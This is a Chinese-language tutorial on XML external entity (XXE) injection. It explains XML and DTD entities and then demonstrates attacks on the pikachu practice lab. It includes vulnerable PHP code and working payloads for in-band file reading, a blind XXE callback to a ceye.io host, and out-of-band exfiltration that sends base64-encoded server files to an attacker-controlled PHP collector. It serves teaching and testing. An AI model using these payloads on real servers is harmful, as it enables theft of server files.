XXE -"xml external entity injection"
既"xml外部实体注入漏洞"
攻击者可以注入XML实体内容,并由服务器解析执行,从而引发问题。
该漏洞通常被用来读取服务器本地文件。
0x00 什么是XML
XML 指可扩展标记语言(EXtensible Markup Language)
XML 是一种标记语言,很类似 HTML
XML 的设计宗旨是传输数据,而非显示数据
XML 标签没有被预定义。您需要自行定义标签。
XML 被设计为具有自我描述性。
XML 是 W3C 的推荐标准XML与HTML的区别:
XML 不是 HTML 的替代。
XML 和 HTML 为不同的目的而设计:
XML 被设计为传输和存储数据,其焦点是数据的内容。
HTML 被设计用来显示数据,其焦点是数据的外观。
HTML 旨在显示信息,而 XML 旨在传输信息。XML的结构:
<?xml version="1.0" encoding="ISO-8859-1"?> <!--第一部分是 XML 声明。它定义 XML 的版本 (1.0) 和所使用的编码 (ISO-8859-1)--> <!DOCTYPE note[ <!--定义此文档是note类型的文档--> <!ENTITY entity-name SYSTEM "URI/URL"> <!--外部实体声明--> ]> <!--第二部分:文档类型定义 DTD--> <note> <to>George</to> <from>John</from> <heading>Reminder</heading> <body>Don't forget the meeting!</body> </note> <!--第三部分:文档元素-->DTD实体(XXE攻击关键):
实体是用于定义引用普通文本或特殊字符的快捷方式的变量。实体可在内部或者外部声明。
内部引用:<!ENTITY 实体名称 "实体的值">
外部引用:<!ENTITY 实体名称 SYSTEM "URI/URL">实体又分为一般实体和参数实体
1,一般实体的声明语法:<!ENTITY 实体名 "实体内容“>
引用实体的方式:&实体名;
2,参数实体只能在DTD中使用,参数实体的声明格式:<!ENTITY % 实体名 "实体内容">
引用实体的方式:%实体名;
0x01 带回显的XXE攻击 (Normal XXE)
使用靶场:pikachu
查看一下关键代码:$html=''; //考虑到目前很多版本里面libxml的版本都>=2.9.0了,所以这里添加了LIBXML_NOENT参数开启了外部实体解析 if(isset($_POST['submit']) and $_POST['xml'] != null){ $xml =$_POST['xml']; $data = @simplexml_load_string($xml,'SimpleXMLElement',LIBXML_NOENT); if($data){ $html.="<pre>{$data}</pre>"; }else{ $html.="<p>XML声明、DTD文档类型定义、文档元素这些都搞懂了吗?</p>"; } }simplexml_load_string() 函数转换形式良好的 XML 字符串为 SimpleXMLElement 对象,同时开启了外部实体解析,没有做任何过滤。
那么通过payload:<?xml version = "1.0"?> <!DOCTYPE note [ <!ENTITY hacker SYSTEM "file:///c:/windows/win.ini"> ]> <name>&hacker;</name>便可实现任意文件读取
image.png
0x02 无回显的XXE攻击 (Blind XXE)
修改一下代码,不回显数据:
$html=''; //考虑到目前很多版本里面libxml的版本都>=2.9.0了,所以这里添加了LIBXML_NOENT参数开启了外部实体解析 if(isset($_POST['submit']) and $_POST['xml'] != null){ $xml =$_POST['xml']; $data = @simplexml_load_string($xml,'SimpleXMLElement',LIBXML_NOENT); if($data){ // $html.="<pre>{$data}</pre>"; $html.="<pre>解析成功</pre>" }else{ $html.="<p>XML声明、DTD文档类型定义、文档元素这些都搞懂了吗?</p>"; } }构造payload让服务器发送请求到我们的服务器确认存在xxe漏洞,过程服务器端可能会出错,但服务器确实是发送了请求。
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note [ <!ENTITY % remote SYSTEM "http://xxxx.ceye.io/blind_xxe_test"> %remote; ]> <name>test</name>
0x03 无回显的XXE攻击 (Blind OOB XXE)
若想将%参数的内容直接放到url里面会报错的,想使用该方法就需要引用外部实体
首先在攻击服务器上写下blind_xxe.php文件:<?php file_put_contents('1.txt',$_GET['yy']); ?>写入外部实体文件,test.xml:
<!ENTITY % all "<!ENTITY % send SYSTEM 'http://xxx.com/blind_xxe.php?yy=%file;'>">然后在靶机提交一下payload
注意先引用%all后再引用%send,test.xml中单引号中的‘%’号需要进行实体编码,这样就可以在无回显的情况下读取服务器文件了<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE note [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/win.ini"> <!ENTITY % remote SYSTEM "http://xxx.com/test.xml"> %remote; %all; %send; ]> <name>test</name>
